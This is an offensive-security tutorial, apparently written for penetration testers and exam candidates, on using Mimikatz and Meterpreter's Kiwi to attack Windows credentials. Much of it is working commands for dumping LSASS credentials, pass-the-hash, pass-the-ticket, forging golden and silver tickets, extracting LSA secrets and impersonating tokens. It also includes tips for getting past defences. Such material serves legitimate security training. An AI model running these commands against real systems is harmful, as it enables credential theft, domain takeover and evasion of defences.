Mimikatz & Kiwi: Weaponizing Credentials in Windows
In the world of Windows post-exploitation, Mimikatz is your scalpel and Kiwi is your Swiss army knife. These tools help you extract, impersonate, and abuse credentials from user hashes to domain secrets, in ways that can flip the whole network in your favor.
This guide breaks down how Mimikatz works, what Kiwi is, and how to use both effectively during real-world engagements and exam scenarios.
What Is Mimikatz?
Mimikatz is a post-exploitation tool developed by Benjamin Delpy (@gentilkiwi) that allows you to extract plaintext passwords, NTLM hashes, Kerberos tickets, and more from Windows memory.
It’s widely used in both red team operations and real-world attacks because it works directly with Windows authentication systems.
How Mimikatz Works
Mimikatz interacts directly with Windows subsystems like:
- LSASS (Local Security Authority Subsystem Service)
- WDigest
- SSP, TSPKG, and Kerberos authentication packages
These subsystems often store credentials or tickets in memory.
To run Mimikatz effectively, you need elevated privileges, either as Administrator or SYSTEM.
Core Mimikatz Functions
1. Enable Debug Privileges
privilege::debug
# Grants the required permissions to access system processes like LSASS
2. Dump Credentials From LSASS
sekurlsa::logonpasswords
# Dumps usernames, plaintext passwords, NTLM hashes, and Kerberos tickets from memory
3. List Kerberos Tickets
sekurlsa::tickets
# Shows Kerberos tickets currently stored in memory
4. Pass-the-Hash (PTH)
sekurlsa::pth /user:Bob /domain:corp.local /ntlm:<NTLM_HASH> /run:cmd.exe
# Creates a new session as the specified user using their NTLM hash
5. Pass-the-Ticket (PTT)
kerberos::ptt <ticket.kirbi>
# Injects a forged or stolen Kerberos ticket into memory
6. Dump LSA Secrets
lsadump::lsa /inject
# Extracts LSA secrets like service account credentials and auto-logon passwords
Safer Approach: Offline Dumping
Uploading Mimikatz to a live host is noisy. Safer method: dump LSASS and analyze it offline.
Dump LSASS With ProcDump
procdump -ma lsass.exe lsass.dmp
# Dumps the memory of the LSASS process into a file
Analyze With Mimikatz
mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
# Loads the dump and extracts credentials offline
Golden and Silver Ticket Attacks
If you’ve compromised a Domain Controller and obtained the KRBTGT account’s hash, you can forge:
Golden Ticket
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt
# Grants a forged TGT that gives you Domain Admin access across the domain
Silver Ticket
kerberos::golden /user:svc /domain:corp.local /sid:S-1-5-21-... /rc4:<service_hash> /service:cifs /target:dc.corp.local /ptt
# Grants access to a specific service like CIFS (SMB) on a specific target
Mimikatz via Metasploit (Kiwi Module)
Kiwi is a port of Mimikatz built into Meterpreter, allowing in-memory credential dumping without uploading binaries.
Load Kiwi
load kiwi
# Loads the Kiwi extension inside Meterpreter
Dump All Credentials
creds_all
# Grabs credentials from memory
Dump NTLM Hashes
hashdump
# Dumps user password hashes from the SAM database
Kerberos Ticket Dump
kerberos_ticket_list
# Shows all Kerberos tickets on the system
Defenses That May Block Mimikatz
Be aware of protections that can block or hinder Mimikatz:
- LSASS Protected Process Light (PPL)
- Credential Guard
- WDigest disabled
- Event Logging
- AV/EDR integrations
Bypass techniques include dumping LSASS offline or using process injection tools.
Incognito Module – Token Manipulation in Mimikatz
The Incognito module in Mimikatz is used for managing and abusing access tokens on a compromised Windows system. Tokens represent a user’s security context — and if you’re holding a token, you can act like that user.
This technique is commonly used for privilege escalation or lateral movement, especially after you’ve compromised a system and want to move through the network without needing credentials.
🛑 Note: The incognito module used to be a part of older Mimikatz builds, but newer versions of Mimikatz don’t explicitly call it “Incognito” anymore — however, the token manipulation features still exist, just via different commands.
What Can You Do with Incognito/Token Commands?
- List tokens (delegation and impersonation)
- Impersonate a token
- Pass tokens to new sessions (e.g., spawn a shell as another user)
Commands
Below are common commands used for token manipulation in Mimikatz:
1. Load Mimikatz and elevate if needed:
privilege::debug
Enables SeDebugPrivilege which is required for many token-related tasks
2. List all available tokens:
token::list
Shows all impersonation and delegation tokens on the system
3. Impersonate a token:
token::impersonate <TOKEN_ID>
Replace <TOKEN_ID> with the ID from the token::list output
4. Spawn a shell with the impersonated token:
!cmd
You now have a shell running as the impersonated user
Pro Tips
- Look for tokens belonging to Domain Admins or privileged accounts.
- Combine token impersonation with “MakeToken” for even more flexibility:
sekurlsa::logonpasswords
token::maketoken <domain>\<username> <password>
- This will make a new token using the supplied credentials.
In modern use, the sekurlsa, token, and logonpasswords modules are your go-to tools for token manipulation in Mimikatz. It’s a powerful way to move laterally or elevate privileges after an initial foothold.
Mimikatz Cheatsheet
| Objective | Command Example |
|---|---|
| Enable Debug Privileges | privilege::debug |
| Dump Plaintext Creds | sekurlsa::logonpasswords |
| Dump Kerberos Tickets | sekurlsa::tickets |
| Pass-the-Hash | sekurlsa::pth /user:... /ntlm:... /run:cmd.exe |
| Inject Kerberos Ticket | kerberos::ptt <ticket.kirbi> |
| Golden Ticket | kerberos::golden /user:... /krbtgt:<hash> /ptt |
| Dump LSA Secrets | lsadump::lsa /inject |
| Meterpreter: Load Kiwi | load kiwi |
| Meterpreter: Dump All Creds | creds_all |